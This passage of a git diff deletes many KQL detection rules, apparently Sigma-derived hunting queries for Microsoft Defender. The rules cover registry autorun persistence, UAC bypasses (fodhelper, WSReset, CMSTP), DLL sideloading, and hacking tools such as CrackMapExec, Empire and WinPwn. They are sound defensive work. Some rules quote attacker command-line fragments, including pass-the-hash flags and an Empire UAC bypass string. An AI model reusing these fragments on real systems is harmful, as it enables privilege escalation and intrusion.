-| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey contains "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe"))))
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index 54e850a7..00000000
--- a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and (not((RegistryValueData in~ ("(Empty)", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"))))
\ No newline at end of file
diff --git a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
deleted file mode 100644
index ec001999..00000000
--- a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql b/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql
deleted file mode 100644
index 8dbd183f..00000000
--- a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Semanur Guneysu @semanurtg, oscd.community
-// Date: 2020/10/28
-// Level: high
-// Description: Detection of unusual child processes by different system processes
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD ")))
\ No newline at end of file
diff --git a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql b/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql
deleted file mode 100644
index d7eb1414..00000000
--- a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp")
\ No newline at end of file
diff --git a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql b/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql
deleted file mode 100644
index 0c2064b2..00000000
--- a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and ProcessIntegrityLevel =~ "System")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql
deleted file mode 100644
index d35ec172..00000000
--- a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: high
-// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql b/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql
deleted file mode 100644
index 76abcf3f..00000000
--- a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql b/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql
deleted file mode 100644
index 59a7340a..00000000
--- a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nextron Systems
-// Date: 2022/01/06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql b/Privilege Escalation/Bypass_UAC_via_CMSTP.kql
deleted file mode 100644
index 8ff3d7ea..00000000
--- a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql b/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql
deleted file mode 100644
index 99e8774a..00000000
--- a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql b/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql
deleted file mode 100644
index 3524a28c..00000000
--- a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019/10/24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/COM_Hijack_via_Sdclt.kql b/Privilege Escalation/COM_Hijack_via_Sdclt.kql
deleted file mode 100644
index 91b9bc53..00000000
--- a/Privilege Escalation/COM_Hijack_via_Sdclt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omkar Gudhate
-// Date: 2020/09/27
-// Level: high
-// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
-// Tags: attack.privilege_escalation, attack.t1546, attack.t1548
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql b/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
deleted file mode 100644
index 5f8aed77..00000000
--- a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72, oscd.community
-// Date: 2020/10/14
-// Level: high
-// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
-// Tags: attack.execution, attack.privilege_escalation, attack.t1055
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql b/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql b/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
deleted file mode 100644
index a4dbd554..00000000
--- a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco
-// Date: 2019/08/30
-// Level: critical
-// Description: Detects some Empire PowerShell UAC bypass methods
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql b/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql
deleted file mode 100644
index 38bdaaa1..00000000
--- a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/27
-// Level: high
-// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql b/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql
deleted file mode 100644
index 335281d7..00000000
--- a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/20
-// Level: critical
-// Description: Detects the use of SharpUp, a tool for local privilege escalation
-// Tags: attack.privilege_escalation, attack.t1615, attack.t1569.002, attack.t1574.005
-DeviceProcessEvents
-| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql b/Privilege Escalation/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql b/Privilege Escalation/HackTool_-_winPEAS_Execution.kql
deleted file mode 100644
index 320e767a..00000000
--- a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Georg Lauenstein (sure[secure])
-// Date: 2022/09/19
